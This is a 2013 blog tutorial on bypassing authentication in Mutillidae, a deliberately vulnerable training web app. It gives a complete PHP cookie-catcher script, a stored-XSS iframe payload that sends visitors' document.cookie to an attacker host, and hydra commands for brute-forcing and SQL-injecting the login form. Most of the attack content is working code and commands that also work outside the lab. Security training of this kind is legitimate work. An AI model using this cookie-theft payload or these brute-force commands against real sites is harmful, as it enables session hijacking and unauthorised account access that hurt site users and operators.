Wednesday, November 20, 2013

Broken Authentication & Session Management in Mutillidae

Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.

  • Authentication Bypass
  • Privilege Escalation
  • Username Enumeration

We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use authentication bypass method.

  1. Using cookie
  2. Using brute-force
  3. Using SQL injection

(1)Authentication Bypass using cookie:- 

As we know that , mutillidae is vulnerable to XSS, so we can capture cookie with help of XSS. We are going to take advantage of persistent XSS.

http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php

Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.

Content of cookie_catcher.php :-

<?php
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time & date.

Now as anonymous user , we will add blog entry.I used other OS on my virtual box for attack.

(1)Open http://192.168.56.1/mutillidae/index.php?page=add-to-your-blog.php

(2)Submit following html to blog

<html>
<body>
<b> nirav k desai</b>
<u>help me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.56.1/cookie_catcher.php?c="+document.cookie) </iframe >
</body>
</html>

authentication-bypass-using-cokkie

Replace Link http://192.168.56.1/cookie_catcher.php to your uploaded cookie_catcher.php

(3)Now when "admin" or any "logged user" show your added blog entry , you will get his cookie, i.p., date & time.

persistent-xss

(4)To view cookie open cookie.html.

cookie-catcher
 
(5)Now you can use any cookie manager add-on to edit cookie; replace cookie which we got.

cookie-manager

(6)After reload we got admin access to web-application.

admin-access

(2)Authentication Bypass Using bruteforce:- 

You can use hydra or burpe intruder to bruteforce login form of application.

hydra -l admin -P /root/pass.txt  127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

Bruteforce-Using-Hydra

(3)Authentication Bypass Using sql injection:- 

We can inject special database characters or SQL timing attacks into page parameters. We are going to use login page; and inject sql character to  login form.

You can use SQL injection cheat sheet & we will brute-force  using SQL statements.Save it to file.

hydra -l admin -P /root/sql 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

SQL-injection_cheat-sheet

And we got for valid SQL statements ; with help of it we can bypass admin panel.

No comments:

Post a Comment